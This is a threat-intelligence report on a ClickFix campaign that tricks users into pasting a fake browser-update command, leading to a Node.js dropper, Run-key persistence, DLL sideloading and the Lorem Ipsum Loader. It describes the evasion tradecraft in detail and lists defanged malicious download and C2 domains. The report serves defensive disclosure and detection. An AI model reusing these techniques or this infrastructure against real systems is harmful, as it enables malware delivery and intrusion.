Lorem Ipsum Revisited

What Happened?

BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) researchers have been tracking an active ClickFix campaign that manipulates users into believing their web browser requires a security update. If the user complies, the ClickFix lure initiates a multi-stage infection chain that ultimately deploys the Lorem Ipsum Loader, a malware family BlueVoyant first documented in May 2026. The current campaign represents a notable evolution from the previous Lorem Ipsum operation, which distributed trojanized Microsoft Teams installers through SEO-poisoned and malvertised fake download portals. The pivot to ClickFix lures hosted on compromised WordPress (WP) sites significantly broadens the potential victim pool and demonstrates the operators' willingness to rapidly adapt their initial access techniques. 

BlueVoyant assesses with high confidence that this delivery pivot was reactive rather than strategic — driven directly by Microsoft's 19 May 2026 Digital Crimes Unit disruption of Forging Marauder (a.k.a. Fox Tempest), a malware-signing-as-a-service (MSaaS) provider that had supplied the operators with fraudulently signed Microsoft Trusted Signing certificates since at least June 2025. The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely. 

Despite the change in delivery, the underlying Lorem Ipsum tooling demonstrates strong continuity with the previous campaign — including the signature substitution-cipher payload reconstruction routine now implemented across PowerShell, JavaScript, and native code; dual DLL sideloading vectors; the preserved -=( and )=- dead-drop delimiter convention; and the per-victim UUID-tracked command-and-control (C2) architecture. The dead-drop resolver platform has migrated from letsdiskuss[.]com to digitalpoint[.]com following BlueVoyant's prior public disclosure, with a corresponding rotation of the C2 cluster. 

BlueVoyant assesses with high confidence that the Lorem Ipsum ecosystem is operationally linked to Rapid Brigantine (a.k.a. Vanilla Tempest) activity and likely supports Rapid Brigantine intrusion operations, based on delivery-model overlap, tooling lineage, infrastructure patterns, and publicly reported post-exploitation tradecraft. Rapid Brigantine is a financially motivated threat group active since at least mid-2022 known for deploying ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker. Lorem Ipsum appears to be a parallel or successor loader within Rapid Brigantine's expanding toolkit, culminating in handoff to their documented post-exploitation arsenal (Supper, Oyster, MeowBackConn) and ultimately to Rhysida ransomware deployment. 

Key Findings

• Delivery pivot driven by Microsoft's disruption of Forging Marauder. The late-May 2026 shift from signed Microsoft Teams MSI installers to ClickFix browser update lures coincides directly with Microsoft DCU's 19 May 2026 takedown of Forging Marauder's MSaaS infrastructure, which eliminated Rapid Brigantine's certificate supply. 
• High-confidence attribution to Rapid Brigantine. Three independent attributions of the trojanized Teams installer delivery model to Rapid Brigantine, shared post-exploitation tooling, and operational tradecraft alignment support the upgraded confidence level. 
• Tooling lineage spans three runtime environments. The signature substitution-cipher reconstruction routine appears across PowerShell (previous campaign), JavaScript (current Update.js dropper), and native code (current mscoree.dll) — a tradecraft fingerprint highly unlikely to be coincidentally replicated. 
• Multi-stage chain abuses portable Node.js runtime. The infection chain downloads a legitimate, signed Node.js v7.10.1 binary from the official distribution site to execute the JavaScript dropper — a living-off-the-land technique absent from prior Lorem Ipsum samples. 
• Custom word-position encoding conceals embedded payloads. Update.js uses a text-based substitution scheme encoding binary content as ordered sequences of innocuous-looking words, reconstructing executables at runtime in a manner that complicates static analysis. 
• Dual DLL sideloading vectors deployed in parallel. The operators maintain both mscoree.dll and msvcp140.dll sideloading pairs in the current sample corpus, providing redundancy across detection signatures. 
• Dead-drop resolver migrated from LetsDiskuss to DigitalPoint. The operators retained the -=( and )=- delimiter convention, substitution-cipher decoding logic, and one-profile-to-one-C2-cluster operational mapping despite the platform migration. 
• C2 infrastructure fronted behind Cloudflare with per-victim redundancy. Each infection beacons to three redundant Cloudflare-fronted C2 domains using the same per-victim UUID, complicating takedown and rendering IP-based blocking ineffective. 

Initial Access via Compromised WP Sites 

The attack begins when a user visits a website infected by the threat group. The website displays an iframe, presenting the user with a fake pop up indicating that their browser is out of date. The iframe includes instructions on how to remediate, simply by opening up windows terminal (wt.exe) and pasting a command into the terminal. 

After interacting with the compromised site, BlueVoyant researchers observed the iframe contained the following code:

The PowerShell command illustrated above masquerades as a legitimate Microsoft Edge security intelligence update while performing a series of actions unrelated to updating Microsoft Edge. The script begins by displaying a reassuring status message to the user before downloading a ZIP archive named Update.zip from hxxps://autoupdatet[.]com/get_update?i=75975, saving the file to the C:\ProgramData directory. It then downloads a portable copy of Node.js v7.10.1 from the official Node.js distribution site, storing the archive locally as msedge.zip.  

The choice of Node.js v7.10.1 — a version released in 2017 and long deprecated — is itself analytically notable. The operators' deliberate selection of an outdated runtime likely reflects its smaller binary footprint, reduced runtime overhead, absence of modern JavaScript security hardening features that could complicate execution of the dropper script, and the operational reality that the legitimate Node.js distribution site continues to host historical versions, providing a stable and trusted download URL that has not changed since the version's original release. By leveraging a legitimate and widely used runtime, the threat actor can execute JavaScript-based payloads without relying on a traditional standalone executable. 

After both archives have been downloaded, the script extracts their contents into C:\ProgramData. Once unpacked, it launches node.exe from the extracted Node.js archive and supplies Update.js, delivered within the downloaded payload archive as an argument. This causes the attacker-provided JavaScript to execute using the Node.js runtime. The process is started with a hidden window, reducing the likelihood that the user will notice the activity occurring in the background. 

The script also launches a second hidden PowerShell process with the execution policy set to Bypass, allowing the embedded commands to run without being restricted by local PowerShell execution policy settings. These techniques help minimize visible indicators of execution while facilitating the delivery and execution of the next-stage payload. BlueVoyant additionally observed the PowerShell loader incorporating anti-debug and sandbox detection logic, consistent with the operators' broader anti-analysis posture documented in prior campaigns. 

Upon completion, the script displays the message: "Done! msedge security intelligence version 1.449.542.0 (2026) successfully installed." This message is simply text written to the console and does not indicate that a genuine Microsoft Edge update has occurred. Instead, it serves as a form of social engineering designed to convince the user that a legitimate security update was successfully installed, while the downloaded JavaScript payload continues executing in the background. 

BlueVoyant observed autoupdatet[.]com operating alongside a rotating pool of at least 11 themed update domains, all serving payloads through identical /get_update?i=<numeric_id> URL templates. Analysis of compromised WordPress sites hosting the ClickFix iframe — spanning industries from architecture and legal services to non-profits, construction technology, and content publishing — confirms autoupdatet[.]com, autoupdaters[.]com, and autoupdatethis[.]com as the currently active production cluster, consistent with opportunistic mass compromise of vulnerable WordPress installations rather than targeted site selection. 

Node.js-Executed JavaScript Dropper

Initial analysis of the downloaded Update.js file led BlueVoyant researchers to assess that the script functions as a dropper/loader designed to deploy and execute additional malware components. This assessment was based on several immediately observable characteristics, including variables referencing executable, DLL, and batch file payloads, functions responsible for writing files to disk, and logic used to launch newly created processes. Executed through the Node.js runtime previously downloaded by the PowerShell script, Update.js imports several Node.js modules, including fs, path, crypto, and child_process, providing capabilities for file system interaction, cryptographic hashing, and process execution. Subsequent analysis confirmed that the script reconstructs payloads from embedded encoded data, writes them to disk, and executes them on the victim system.

The script defines a target directory within C:\ProgramData\ using the folder name ".NET Runtime Optimization Service c8w2i9KUtgpF", which closely resembles the naming convention of legitimate Windows and .NET components. This naming scheme appears intended to help the malware blend into the operating system and avoid drawing attention during casual inspection. 

One of the more notable features of the script is its use of a custom text-based encoding scheme to conceal the embedded payloads. Rather than storing executable content directly within the JavaScript source, the malware contains several large strings comprised of seemingly random words and numbers such as "gentle", "silver", "unfurl", "stitches", and other recurring terms. At first glance, these strings resemble meaningless text; however, they actually serve as encoded representations of binary data. BlueVoyant researchers identified this payload reconstruction technique resembles the binary reconstruction process previously documented in BlueVoyant research on the Lorem Ipsum Loader, where encoded text-based data was similarly decoded and reconstructed into executable payloads at runtime. 

The script maintains a predefined word list and uses the function writePositionsToFile() to convert words from the encoded strings into byte values. For each word encountered, the function determines its position within the master word list and uses that position as the corresponding byte value. The resulting values are assembled into a buffer and written directly to disk. In effect, the malware reconstructs executable files from word positions rather than storing the binaries in their original form. This technique allows the malicious payloads to remain hidden within apparently harmless text, making static analysis and signature-based detection significantly more difficult. 

To support this process, the script implements several helper functions for logging activity, calculating SHA-256 hashes, writing files to disk, and launching processes. The logging and hashing functionality also provides basic verification that the reconstructed files were written successfully. The Update.js dropper additionally implements deliberate long-sleep intervals during execution — a sandbox-evasion technique designed to outlast short-duration automated analysis sessions before reconstructing and executing its payloads. 

After creating the destination directory, the script decodes and reconstructs three files: 

• NET Runtime Optimization Service.exe 
• mscoree.dll 
• c8w2i9KUtgpF.bat 

Each file is written to the newly created directory under C:\ProgramData\. The script then verifies that all expected files exist before proceeding with execution. 

Once reconstruction is complete, the script launches the batch file c8w2i9KUtgpF.bat, passing the newly created executable as an argument. It subsequently attempts to execute NET Runtime Optimization Service.exe directly. Throughout execution, the script records status messages indicating successful file creation and launch attempts while generating warnings or errors if files are missing or execution fails.

Overall, Update.js serves as a second-stage payload responsible for decoding, dropping, and executing additional malware components. Rather than embedding executable files directly within the script, the threat actor conceals them using a custom word-position encoding mechanism and reconstructs them only at runtime — an approach that reduces the visibility of the malicious binaries, complicates manual analysis, and hinders security products relying on static file signatures.

Interestingly, while JavaScript-based Update.js is the dominant dropper variant observed in the current ClickFix campaign, BlueVoyant also identified VBS-based variants producing an identical downstream payload set, indicating the operators maintain multiple dropper implementations to accommodate different delivery vectors while keeping the underlying Lorem Ipsum chain consistent.

Registry-Based Persistence

Analysis of the reconstructed c8w2i9KUtgpF.bat file reveals that its primary purpose is to establish persistence for the dropped payload. The script begins by validating that a file path has been supplied as a command-line argument and confirms that the specified file exists on disk. If either condition is not met, the script displays an error message and terminates.

Once the supplied file path has been validated, the batch script creates a new registry value within HKCU\Software\Microsoft\Windows\CurrentVersion\Run, a commonly abused Windows autorun location that causes programs to execute automatically when a user logs in. The registry value is named "NET Runtime Optimization Service 50Fs4tMIDVSm", a name that closely resembles legitimate .NET Framework components and may be intended to blend in with normal operating system entries.

The registry value's data is set to the path of the executable supplied as an argument to the batch file, which in this case corresponds to the previously reconstructed NET Runtime Optimization Service.exe payload. As a result, the executable will automatically launch each time the affected user signs into Windows, providing the malware with persistence across system reboots and user logoff events.

Upon successfully creating the registry entry, the script displays a confirmation message indicating that the file was added to startup. If the registry modification fails, an error message is displayed instead. Overall, the batch file serves as a persistence mechanism, ensuring that the dropped malware payload is automatically executed whenever the user logs into the system.

DLL-Sideloading & Lorem Ipsum Buildout

BlueVoyant researchers determined that NET Runtime Optimization Service.exe is a renamed version of the legitimate Microsoft .NET ClickOnce Launch Utility. The executable's primary purpose is to sideload the accompanying mscoree.dll file, which contains the threat actor's malicious code. While mscoree.dll is the name of a legitimate Windows component, the threat actors created a malicious DLL of the same name to exploit DLL sideloading via the renamed ClickOnce Launch Utility. When NET Runtime Optimization Service.exe loads the malicious DLL at runtime, the embedded code is executed under the context of a trusted Microsoft binary.

BlueVoyant observed the operators using both mscoree.dll and msvcp140.dll as sideloading vectors across the current sample corpus. The msvcp140.dll vector matches the sideloading approach documented in BlueVoyant's previous research on the Teams installer campaign, where a fake msvcp140.dll was paired with a renamed legitimate executable to execute the Lorem Ipsum Loader. The continued use of msvcp140.dll alongside the additional mscoree.dll variant reflects the operators' practice of maintaining multiple sideloading pairs in parallel, providing redundancy across detection signatures and consistent capability across multiple delivery iterations.

Analysis of the malicious mscoree.dll revealed functionality responsible for decoding an embedded payload using a routine nearly identical to the reconstruction mechanism previously observed within Update.js. The embedded payload was determined to be the previously documented Lorem Ipsum Loader.

The Lorem Ipsum Loader is designed to retrieve the next-stage Lorem Ipsum Backdoor from  C2 infrastructure obtained from attacker-controlled profiles hosted on social networking platforms. In earlier campaigns documented by BlueVoyant, the threat actors utilized the social networking site letsdiskuss[.]com, creating multiple accounts whose profile descriptions contained encoded C2 information. The encoded data was embedded between the delimiters "-=(" and ")=-" and decoded by the malware at runtime using a custom reconstruction routine.

More recently, BlueVoyant observed the threat actors migrate away from abusing letsdiskuss[.]com and adopt the forum digitalpoint[.]com for the same purpose. Similar to the previous infrastructure, attacker-controlled DigitalPoint profiles contain encoded C2 information embedded within publicly accessible profile content and enclosed between the same "-=(" and ")=-" delimiters. The continued use of this technique suggests the threat actors have retained their existing infrastructure retrieval methodology while simply changing the hosting platform.

Interestingly, one of the DigitalPoint accounts used by the threat actors was named "TryToDetectMe", potentially serving as a lighthearted challenge to security researchers analyzing the campaign. Like LetsDiskuss, DigitalPoint is a legitimate online community frequented by webmasters, marketers, SEO professionals, and freelancers. By hiding C2 information within user-generated content on otherwise benign platforms, the threat actors can blend their infrastructure into normal web traffic and reduce the likelihood of attracting immediate attention.

All Signs Point to Rapid Brigantine

The current ClickFix campaign represents the most significant operational change observed since BlueVoyant began tracking the Lorem Ipsum ecosystem in February 2026. The previous campaign relied on resource-intensive infrastructure — SEO-poisoned and malvertised download portals, short-validity Microsoft Trusted Signing certificates, and continuously rotated NameCheap-registered MSI delivery domains. The pivot to ClickFix in late May 2026 eliminates the code-signing requirement entirely, substituting the legitimacy of a validly signed installer with a different form of legitimacy: a user voluntarily executing the malicious command in their own terminal. While the ClickFix model broadens the victim pool from users searching specifically for Microsoft Teams to anyone browsing a compromised website, BlueVoyant assesses with high confidence that this pivot was reactive rather than strategic — likely accelerated by Microsoft's May 19th Digital Crimes Unit disruption of Forging Marauder (a.k.a. Fox Tempest), the malware-signing-as-a-service (MSaaS) provider that had been supplying the operators with fraudulently signed certificates since at least June 2025. The introduction of a portable Node.js runtime in the new delivery chain adds a living-off-the-land execution layer absent from prior samples.

While delivery has changed substantially, the underlying tooling reveals strong continuity with the previous campaign BlueVoyant documented. The signature substitution-cipher reconstruction routine — implemented across PowerShell (previous campaign), JavaScript (current Update.js dropper), and native code (current mscoree.dll) — is a tradecraft fingerprint unlikely to be coincidentally replicated. The DLL sideloading mechanism has expanded from msvcp140.dll to include both msvcp140.dll and mscoree.dll in parallel, but the architectural pattern is preserved: a benign-named DLL containing encoded ciphertext, decoded via the operator's signature reconstruction routine into the Lorem Ipsum Loader. The -=( and )=- delimiter convention, the per-victim UUID-tracked C2 architecture, and the dead-drop resolver methodology have all been retained — with the dead-drop platform itself migrating from LetsDiskuss to DigitalPoint following BlueVoyant's prior public disclosure of the LetsDiskuss profiles. BlueVoyant assesses with high confidence that both campaigns share authorship and operator continuity.

BlueVoyant's previous research did not attribute the Lorem Ipsum ecosystem to any named threat group, citing insufficient evidence and assessing the operators as a "rapidly maturing mid-tier criminal threat actor" potentially functioning as an initial access broker. The current research, combined with open-source reporting from Microsoft Threat Intelligence, the DFIR Report, Huntress, and Socura, supports a meaningful update to that assessment. BlueVoyant now assesses with high confidence that the Lorem Ipsum ecosystem is operated by Rapid Brigantine (a.k.a. Vanilla Tempest, DEV-0832, VICE SPIDER, and Vice Society), a financially motivated threat group active since at least mid-2022 known for deploying ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker.

The most consequential supporting evidence comes from two Microsoft Threat Intelligence disclosures bracketing the Lorem Ipsum campaign timeline. In October 2025, MSTIC publicly attributed and disrupted a Rapid Brigantine campaign distributing fake MSTeamsSetup.exe files hosted on Teams-themed malicious domains (i.e. teams-download[.]buzz), driven by SEO poisoning and malvertising, signed with fraudulently obtained Microsoft Trusted Signing certificates, and delivering the Oyster backdoor as a stepping stone to Rhysida ransomware deployment. BlueVoyant's previous research characterized the trojanized Teams installer delivery as SEO poisoning; MSTIC's subsequent reporting indicates malvertising via legitimately purchased advertisements played a significant role alongside SEO poisoning, with the two techniques likely used in combination. Nevertheless, Microsoft disrupted that operation by revoking over 200 fraudulently obtained certificates. In May 2026, MSTIC and Microsoft's Digital Crimes Unit subsequently disrupted Forging Marauder (a.k.a. Fox Tempest), a financially motivated threat actor operating a MSaaS offering via signspace[.]cloud that abused Microsoft Artifact Signing to generate short-lived (72-hour) certificates issued under stolen US/Canadian identities — a precise structural match for the certificate procurement pipeline BlueVoyant documented in the February 2026 Lorem Ipsum campaign and previously attributed to a “systematic certificate procurement pipeline.” 

MSTIC's May 2026 reporting confirms Rapid Brigantine was a Forging Marauder customer since at least June 2025, and provides a case study walking through the Rapid Brigantine attack chain — uploading trojanized Microsoft Teams installers to Fox Tempest's signing infrastructure, distributing them via malvertising and fraudulent download pages, and delivering Oyster as the post-installation payload. This delivery model is a precise structural match to the Lorem Ipsum operation BlueVoyant began tracking in February 2026, and the timing of Microsoft's two disruption events provides clean causal explanations for the operators' subsequent pivots: the October 2025 certificate revocation drove the renewed certificate procurement that produced the Lorem Ipsum-era certificate pattern, and the May 2026 Forging Marauder disruption eliminated the operators' certificate supply entirely, driving the late-May pivot to a ClickFix delivery model that requires no code signing. Based on the technical characteristics documented in BlueVoyant's prior Lorem Ipsum research — the substitution-cipher decoding routine, dead-drop C2 resolution, and JFIF-encapsulated traffic — Lorem Ipsum Loader exhibits behaviors distinct from those publicly documented for the Oyster malware. BlueVoyant assesses that Lorem Ipsum Loader is most likely a parallel or successor loader within Rapid Brigantine's toolkit rather than the same family Microsoft tracks as Oyster, consistent with Rapid Brigantine's documented pattern of operating a diverse, role-specialized arsenal across multiple loaders and backdoors.

Further supporting evidence comes from the DFIR Report's publicly documented April 2026 intrusion, in which a trojanized Microsoft Teams MSI installer (MTSetup_v15.3.7191.msi) initiated a multi-stage infection chain that BlueVoyant separately identified as deploying the Lorem Ipsum Loader. The PowerShell loader executed by the MSI used a command structure that was a precise match for the Lorem Ipsum tradecraft signature in which the AES key and initialization vector are externalized as MSI custom action arguments rather than embedded in the loader. That same intrusion ultimately deployed MeowBackConn, a native DLL backdoor (netdrv.dll) executed via rundll32 with the export Meow and persisted on domain controllers through a SYSTEM-context scheduled task running every 720 minutes. MeowBackConn has been independently associated with Rapid Brigantine by the DFIR Report and others, having been previously observed in the group's Gootloader-delivered intrusions in November 2025 alongside the Supper SOCKS5 backdoor and the Oyster malware family. The intrusion additionally featured an intermediate DLL (askndfao.dll) communicating to 51.222.96[.]58:1080 — the port-1080 traffic pattern consistent with SOCKS proxy functionality and the randomized naming convention matching both Lorem Ipsum's documented file-naming patterns and Rapid Brigantine's Supper backdoor naming conventions.

This evidence produces a coherent multi-campaign timeline in which every major operational pivot has a clear external driver: 

• June–October 2025: Rapid Brigantine distributes fake Microsoft Teams installers signed via Forging Marauder's MSaaS, delivering the Oyster backdoor and Rhysida ransomware (per MSTIC).
• October 2025: Microsoft revokes over 200 fraudulently obtained Forging Marauder-issued certificates attributed to Rapid Brigantine, disrupting the signed-installer pipeline.
• February–April 2026: BlueVoyant first documents the Lorem Ipsum ecosystem — a new loader family deployed via the same fake-Teams-installer model, supported by renewed Forging Marauder-issued certificates exhibiting the 72-hour validity and stolen-identity pattern characteristic of the MSaaS.
• April 2026: The DFIR Report publicly documents a trojanized Teams MSI intrusion deploying both Lorem Ipsum Loader and MeowBackConn on domain controllers, providing the clearest co-deployment evidence linking Lorem Ipsum to Rapid Brigantine's documented post-exploitation arsenal.
• May 19, 2026: Microsoft's Digital Crimes Unit disrupts Forging Marauder's MSaaS infrastructure, revoking over 1,000 certificates and taking down signspace[.]cloud — eliminating Rapid Brigantine's certificate supply.
• Late May–June 2026: Lorem Ipsum operators pivot to ClickFix delivery, eliminating the code-signing requirement entirely (the focus of this research).

Several operational tradecraft patterns observed in the current campaign reinforce this attribution. The ClickFix iframe lure is hosted across at least five compromised WordPress sites spanning architecture, legal services, non-profit, construction technology, and content publishing industries — mirroring the Lure Marauder (a.k.a. Storm-0494, UNC2565)-->Rapid Brigantine pattern documented by Huntress and Socura, in which compromised WordPress infrastructure serves as the delivery layer for Gootloader infections. While the Lorem Ipsum and Gootloader chains are technically distinct, the shared reliance on compromised WordPress infrastructure suggests either common access broker sources, shared compromise tooling, or operator-level coordination between the two pipelines. The active Lorem Ipsum C2 cluster (openanyworddocument[.]com, kittyfreespace[.]com, searchdocumentsfree[.]com) is hosted with Cloudflare, complicating takedown and rendering IP-based blocking ineffective — operationally consistent with mature criminal infrastructure practices. The per-victim UUID architecture, in which each infection beacons to three redundant C2 domains with separate UUID spaces for /api/init/ and the newly observed /api/cl/ endpoint, is conceptually similar to MeowBackConn's documented backup C2 configuration mechanism, reflecting a shared operator philosophy around victim tracking and infrastructure resilience. Finally, the "TryToDetectMe" DigitalPoint profile observed in the current campaign is consistent with operator personalities that engage in lighthearted antagonism toward defenders — a behavioral pattern more commonly observed in named, sustained-operation threat groups than in commodity-level access brokers.

Rather than functioning as an independent initial access broker, the Lorem Ipsum operation appears to be part of Rapid Brigantine's expanding initial access toolkit, operating alongside their Oyster malware pipeline and their Gootloader partnership with Lure Marauder. Rapid Brigantine operates within a broader criminal services ecosystem that included Forging Marauder’s MSaaS (used from at least June 2025 until Microsoft's May 2026 disruption), Lure Marauder's Gootloader initial access service, and direct development or partnership relationships with multiple loader and backdoor families including Lorem Ipsum, Oyster, Supper, and MeowBackConn. The Lorem Ipsum chain culminates in handoff to Rapid Brigantine's established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida. Whether the Lorem Ipsum operators are Rapid Brigantine personnel directly or a closely allied development team providing tooling into Rapid Brigantine's operational pipeline remains an open intelligence gap, but is not required to support the current assessment.

Conclusion

Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption. The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines: restricting script interpreter from user-writable directories via AppLocker or Windows Defender Application Control; alerting on anomalous parent-child process relationships including wt.exe spawning PowerShell with download cradles or portable Node.js executing from C:\ProgramData\; and enabling PowerShell Script Block Logging (Event ID 4104) to capture deobfuscated payload content that is otherwise opaque to static analysis.

Lorem Ipsum-specific detection priorities include monitoring for HKCU Run-key persistence under .NET Runtime Optimization Service-themed naming, alerting on DLL sideloading from non-standard paths, and treating any outbound traffic to letsdiskuss[.]com, digitalpoint[.]com, or the active C2 cluster (openanyworddocument[.]com, kittyfreespace[.]com, searchdocumentsfree[.]com) from non-browser processes as high-priority alerts. Given Rapid Brigantine's documented one-to-seventeen-hour window from initial access to domain controller compromise, defenders should treat any confirmed Lorem Ipsum indicator as an active incident warranting immediate containment and elevated-tempo response rather than routine alert triage.

MITRE ATT&CK Techniques

T1102.001 (Dead Drop Resolver)

T1189 (Drive-by Compromise)

T1204.004 (Malicious Copy and Paste)

T1204 (User Execution)

T1608.004 (Drive-by Target)

T1584.006 (Compromise Infrastructure: Web Services)

T1608.002 (Stage Capabilities: Upload Tool)

T1608.001 (Stage Capabilities: Upload Malware)

T1102.002 (Web Service: Bidirectional Communication)

T1195 (Supply Chain Compromise)

T1588.001 (Obtain Capabilities: Malware)

T1588.005 (Obtain Capabilities: Exploits)

T1608.006 (Stage Capabilities: SEO Poisoning)

T1583.008 (Acquire Infrastructure: Malvertising)

T1681 (Search Threat Vendor Data)

Indicators

hxxps://autoupdatet[.]com/get_update?i=75975

hxxps://openanyworddocument[.]com/api/init/40237612-00ac-4a85-bce9-7400f148c474

letsdiskuss[.]com

digitalpoint[.]com

autoupdatet[.]com

autoupdaters[.]com

autoupdatethis[.]com

openanyworddocument[.]com

kittyfreespace[.]com

searchdocumentsfree[.]com

97bc78ad3fd6549f3a7f9cb31be1ff25d50bac97c42fc6dfff44e47424c5add1 – Update.js

dff20059f161090c76f9f45ac2269f2965bdc96023c78c1072f8d1aa66b06919 – Batch file